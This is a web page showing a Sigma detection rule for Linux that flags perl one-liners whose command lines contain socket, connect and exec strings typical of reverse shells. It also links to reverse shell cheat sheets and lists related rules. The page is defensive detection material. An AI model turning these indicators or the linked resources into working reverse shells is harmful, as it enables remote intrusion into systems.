Potential Perl Reverse Shell Execution
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Sigma rule (View on GitHub)
1title: Potential Perl Reverse Shell Execution
2id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
3status: test
4description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
5references:
6 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
7 - https://www.revshells.com/
8author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
9date: 2023/04/07
10tags:
11 - attack.execution
12logsource:
13 category: process_creation
14 product: linux
15detection:
16 selection_img:
17 Image|endswith: '/perl'
18 CommandLine|contains: ' -e '
19 selection_content:
20 - CommandLine|contains|all:
21 - 'fdopen('
22 - '::Socket::INET'
23 - CommandLine|contains|all:
24 - 'Socket'
25 - 'connect'
26 - 'open'
27 - 'exec'
28 condition: all of selection_*
29falsepositives:
30 - Unlikely
31level: high
References
-
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new accou...
Read More -
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
Read More
Related rules
- Bash Interactive Shell
- BloodHound Collection Files
- Computer Password Change Via Ksetup.EXE
- Conhost Spawned By Uncommon Parent Process
- Exchange PowerShell Snap-Ins Usage